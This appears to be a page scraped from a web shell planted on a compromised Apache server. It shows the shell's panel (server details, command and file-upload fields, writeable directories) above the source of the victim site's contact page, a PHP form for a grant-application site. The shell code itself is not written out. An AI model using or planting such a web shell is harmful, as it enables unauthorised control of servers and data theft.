403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/usagrantapplications.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/usagrantapplications.org/contact.php
<? 
header("Location: /vx/usa/contact/");
exit;
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/php_header.php');
$_SITE_ADDR = 'USA Grant Applications<br />
29L Atlantic Ave #112<br />
Ocean View, Delaware 19970';
$_SITE_PHONE = '1-888-261-4837';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name="description" content="Contact USA Grant Applications. If there is anything on this website that is not meeting expectations or if there is general grant information we can benefit from.">
<title>USA Grant Applications.org - Contact Page</title>

<? include("{$_SERVER["DOCUMENT_ROOT"]}/header.php"); ?>
	<tr>
        	<td style="width:100px;background-color:#dbd7d6;text-align:center" valign="top"></td>
        	<td style="width:590px;background-color:#ffffff;text-align:left;font:9pt/120% verdana;padding:10px 0px 0px 10px">
					<p style="font:bold 12pt/120% MicroMieps;color:#a80000;text-transform:uppercase">Contact Us</p>
		            <p>You may call our toll free number or send an email to our customer support team using the contact form below.</p>
		            <p style="font:10pt/120% MicroMieps;color:#1a3791;">Office Phone: <font style="font:bold 12pt/120% verdana;color:#333333;"><?= $_SITE_PHONE; ?></font></p>
		            <p style="font:10pt/120% MicroMieps;color:#1a3791;">Office Hours:</p>
		            <table cellspacing="0" cellpadding="5px" style="margin-left: 15px; border:1px dotted #333333">
		            	<tr>
		            		<td><font style="font:9pt/120% verdana;color:#333333;">Monday</font></td>
		            		<td style="border-left:1px dotted #333333"><font style="font:9pt/120% verdana;color:#333333;">24 Hours</font></td>
		            	</tr>
		            	<tr>
		            		<td><font style="font:9pt/120% verdana;color:#333333;">Tuesday</font></td>
		            		<td style="border-left:1px dotted #333333"><font style="font:9pt/120% verdana;color:#333333;">24 Hours</font></td>
		            	</tr>
		            	<tr>
		            		<td><font style="font:9pt/120% verdana;color:#333333;">Wednesday</font></td>
		            		<td style="border-left:1px dotted #333333"><font style="font:9pt/120% verdana;color:#333333;">24 Hours</font></td>
		            	</tr>
		            	<tr>
		            		<td><font style="font:9pt/120% verdana;color:#333333;">Thursday</font></td>
		            		<td style="border-left:1px dotted #333333"><font style="font:9pt/120% verdana;color:#333333;">24 Hours</font></td>
		            	</tr>
		            	<tr>
		            		<td><font style="font:9pt/120% verdana;color:#333333;">Friday</font></td>
		            		<td style="border-left:1px dotted #333333"><font style="font:9pt/120% verdana;color:#333333;">24 Hours</font></td>
		            	</tr>
						<tr>
		            		<td><font style="font:9pt/120% verdana;color:#333333;">Saturday</font></td>
		            		<td style="border-left:1px dotted #333333"><font style="font:9pt/120% verdana;color:#333333;">24 Hours</font></td>
		            	</tr>
		            	<tr>
		            		<td><font style="font:9pt/120% verdana;color:#333333;">Sunday</font></td>
		            		<td style="border-left:1px dotted #333333"><font style="font:9pt/120% verdana;color:#333333;">24 Hours</font></td>
		            	</tr>
		            </table>
		            <p style="font:10pt/120% MicroMieps;color:#1a3791;">Office Address:</p>
                    <table cellspacing="0" cellpadding="5px" style="margin-left: 15px; border:1px dotted #333333">
		            	<tr>
							<td><font style="font:10pt/140% verdana"><?=$_SITE_ADDR;?></font></td>
                        </tr>
                    </table>
		            <p style="font:italic 7.5pt/130% verdana; margin:10px 0 10px 20px; width:390px; color:#666666">**Please do not send Order Forms, Money, or Applications to this address.  They will be returned.  All orders are only accepted online through our website.</p>
		            <p style="font:10pt/120% MicroMieps;color:#1a3791;">Secure Email Form:</p>
					<table cellspacing="0" cellpadding="3px" style="margin: 0 0 15px 15px; border:1px dotted #333333">
		            	<tr>
							<td><form method="post" action="sendemail.php">

							<?php
                                $ipi = getenv("REMOTE_ADDR");
                                $httprefi = getenv ("HTTP_REFERER");
                                $httpagenti = getenv ("HTTP_USER_AGENT");
                            ?>

						<input type="hidden" name="ip" value="<?php echo $ipi ?>" />
						<input type="hidden" name="httpref" value="<?php echo $httprefi ?>" />
						<input type="hidden" name="httpagent" value="<?php echo $httpagenti ?>" />
						<a name="contact"></a>
                        <table cellspacing="0" cellpadding="2px" style="margin:5px;">
                            <tr>
                                <td>Name</td>
                            </tr>
                            <tr>
                                <td><input type="text" name="visitor" size="35" /></td>
                            </tr>
                            <tr>
                                <td>Email</td>
                            </tr>
                            <tr>
                                <td><input type="text" name="visitormail" size="35" /></td>
                            </tr>
                            <tr>
                                <td>Message</td>
                            </tr>
                            <tr>
                                <td><textarea name="notes" rows="4" cols="40"></textarea></td>
                            </tr>
                            <tr>
                                <td><input type="submit" value="Send Mail" style="margin:10px 0" /></td>
                            </tr>
                        </table>
                        </form>
                    </td>
                </tr>
            </table>

		</td>
	</tr>

<? include("{$_SERVER["DOCUMENT_ROOT"]}/footer.php"); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit